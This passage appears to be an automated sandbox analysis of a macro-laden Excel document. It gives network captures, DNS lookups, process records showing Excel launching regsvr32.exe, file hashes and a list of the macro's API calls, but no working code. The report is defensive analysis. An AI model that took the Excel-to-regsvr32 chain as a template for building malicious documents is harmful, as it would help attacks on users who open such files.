Jan 11, 2021 18:28:00.389369965 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512084007 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512468100 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512512922 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512586117 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512613058 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.526820898 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.527962923 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.649553061 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650635004 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650715113 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.651102066 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.773710012 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.773785114 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:27:59.992686987 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.852425098 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:36.900594950 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.939555883 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:36.987488985 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.115564108 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.163610935 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.174900055 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.225476980 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.506975889 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.555064917 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.562401056 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.610411882 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.992686987 CET | 8.8.8.8 | 192.168.2.22 | 0x26d4 | No error (0) | 199.59.242.150 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 18:27:41 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f530000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:27:48 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffe30000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f3f0000 |
File size: | 995024 bytes |
MD5 hash: | 45A078B2967E0797360A2D4434C41DB4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\DWWIN.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff840000 |
File size: | 152576 bytes |
MD5 hash: | 25247E3C4E7A7A73BAEEA6C0008952B1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Module1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Module1" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Cells | |
SpecialCells | |
xlCellTypeConstants | |
value | |
Chr | |
Row | |
Split | |
Split | |
Cells | |
Replace | Replace( |